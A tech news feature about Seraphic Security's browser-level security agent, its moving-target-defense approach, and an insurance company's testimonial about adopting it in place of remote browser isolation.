Home Browser Protection – The New Stack

The problem with most browser security products, as Seraphic Security co-founder and CEO Ilan Yeshua sees, is that they expect you to go work somewhere else.

“It’s like you have a nice house and you want to secure your home, but someone comes in and says, ‘We’re going to take you to a safe house in a different place.’ You won’t like it; you would probably like to stay in your own house,” he explained.

Seraphic Security, based in Herzliya, Israel, with an additional office in Wilmington, Massachusetts, recently emerged from stealth after two years. Its approach is to provide security where workers live – in the browser, whether it’s Chrome, Firefox, Safari, Edge or otherwise.

Especially since the pandemic, with so many people working from home or in other remote locations, they’re increasingly relying on SaaS apps on their personal devices to do their jobs, and security teams are struggling — or have even gave up trying – to lock down what users can do. At the same time, the browser provides a giant window for hackers to carry out malicious activities.

“No one will tell employees, ‘Don’t use your own device. … mobile, no one will tell you not to use it. And no one will tell you what apps to use. In the past, organizations used to to dictate everything – you only work here, my devices and use the app I tell you to use.

“Today, employees pick apps and organizations follow because they realize the walled garden isn’t good for productivity,” he said.

CISOs are looking for seamless, frictionless security solutions, Frost & Sullivan wrote in a report on enterprise browser security.

“Backhauling all user traffic to secure it for remote users does not enable a native experience where users can directly access a cloud application,” the report said.

Driven by chance

Seraphic’s approach is inspired by Moving Target Defense, a concept introduced to the US military in the 1950s to increase complexity for attackers, reduce their window of opportunity and increase the costs of their efforts.

In the 1950s, when all communications were analog with no encryption, the US military used frequency hopping. Every few seconds, they would jump to a new frequency, explained co-founder and CTO Avihay Cohen. So if an adversary was listening, they had to continually spend time trying to find the next frequency. Although it wasn’t exactly rugged, it worked, he said.

He likens Seraphic’s approach to an ever-changing lock.

“We’re introducing a new type of lock that changes every time you try to pick it. So the lock is the browser in this case, and it’s getting more and more chaotic and random, which is completely and solidly capable of prevent exploitation,” he said.

It relies on a lightweight agent that runs within the JavaScript Engine (JSE), installed on client devices, which provides deep visibility into malicious activity as it unfolds, at which point the attack is blocked. The agent has negligible impact on system performance, according to Cohen, and some customer staff didn’t even notice a difference when installing it.

The technology creates an abstraction layer that produces rich runtime telemetry that can thwart attacks such as zero-day, unpatched n-day exploits, and sophisticated spear phishing.

Runtime telemetry also enables Seraphic Security to provide granular policy governance and enforcement, preventing issues such as sensitive data leakage and user credential theft in real time.

At the “crime scene”

Two things make the seraphic approach unique, according to Yeshua. First of all, it does not rely on detection.

“By definition, when you do detection, you base yourself on known patterns. You do some sort of comparison with signatures or other things. And then the problem is that hackers are always one step ahead,” he said.

“If you don’t base your approach on detection, you don’t fall into this cat-and-mouse game because you don’t care about the model. You are simply modifying the target in a way that is randomized unexploitably by the code, because any malicious code to run must get brackets inside the target. And if we change the target in an unexpected way for the malicious code, then it becomes unusable,” he said.

The second is that most existing solutions – endpoint protection (EPP) or endpoint detection and response (EDR) – attempt to monitor and mitigate the browser from the perimeter, rather than inside the browser itself. same. They act after execution and rely on detection. Additionally, they want workers to use only a dedicated browser.

Some of the newer competitors in this space include Dallas-based Island, which offers a secure enterprise browser; the Israeli startup Guardio, which offers an extension in the browser; and Israel-based Talon, which has developed a device-agnostic solution called TalonWork that acts as a secure browser for businesses.

Says Yeshua: “We are not an agent of the operating system of the operating system. We are at the level of the browser itself. We say we are located at the scene of the crime. If the scene of the crime is the browser, why should we try to monitor the browser, audit it, and mitigate it from the perimeter? Let’s put our capabilities inside the browser.

Organizations can set governance policies such as copy/paste and data loss prevention controls. It is possible to use an optical character recognition (OCR) engine to scan images and set controls for sensitive content, as well as different installation choices. For example, should the solution work even when an employee is browsing the web for personal use?

Depending on the configuration of the facility, Yeshua and Cohen claim that the agent would continue to protect workers even outside of working hours, but they maintain that confidentiality would still be protected. Because all information processing takes place locally in the agent, no data is sent to a proxy, gateway, or server. Nothing goes in the cloud.

A testimony

Israeli company Clal Insurance and Finance had been using full remote browser isolation (RBI) for nearly seven years and was happy with it for the first five, according to Haim Inger, CTO and vice president of infrastructure and operations.

Over the past two years, however, as it grew its footprint in the public cloud, the company began to encounter more sites that did not perform well or at all with the full RBI solution. The user experience was badly damaged, he said.

With responsibility for all of the company’s IT infrastructure and cyber defense products, he and his team set out to find more appropriate solutions. He explained what they found:

  • Full RBI solutions are all the same, and you’ll end up with many websites that aren’t RBI compatible, so you’ll be accessing those sites directly, bypassing full RBI protection for sites that contain your most valuable data. , such as as a public cloud-based CRM.
  • Other providers offer a partial RBI approach, accessing unknown sites with RBI and known sites with just a proxy server. This approach is very dangerous because an attacker can install malware on one of your well-known and good sites so that browsing from the organization causes immediate damage to the computer and from there to the entire network.

“So our conclusion was [that] we need to find a product that secures the browser and protects it 100% of the time of use while enabling a native user experience,” he said.

They consulted with a company that offered a secure Chromium-based browser, which seemed like a good idea at first, but after a proof of concept, they found three issues:

  • We needed to replace the Edge or Chrome browser in our organization. It’s not a simple thing to do. We still have a lot of web apps that required the Edge compatibility feature for IE11 and even IE6.
  • The dedicated browser needs to be updated every time Google finds a zero day in its browser, which happens every month.
  • So even if we rewrite our old apps to be native to Chromium and use the new secure browser as our only browser, we can’t update the browser every three to four weeks because we have around 200 apps that we need to make sure they will work with. the new version of the browser. It takes us about six weeks to complete these tests, and using this solution means four to six weeks of being vulnerable to a known zero-day attack.

“That’s the point we met Seraphic,” he said. “They promised us that their solution would protect us from zero-day attacks with our current Edge and Chrome browsers while giving us a full native user experience, and even new features we never had like hijacking detection. click, anti-phishing and other well-known browser-based attacks.

He admitted it sounded too good to be true, but was curious, so decided to do a POC. The teams compared well-known attacks on older unprotected versions of Chrome and Edge, and the Seraphic solution on the same machines using the same old browsers. They found that 100% of previous attacks were blocked with Seraphic and equal success with newer features like anti-phishing and the like.

They then checked the user experience. “Users have really been asking me when can I migrate them from the full RBI to the ‘new surf thing you’re testing,'” Inger said.

The Seraphic technology replaced both the previous RBI solution and an older proxy server the company used, he said.

The owner of TNS, Insight Partners, is an investor in: Island.

Feature image via Pixabay.

Comments are closed.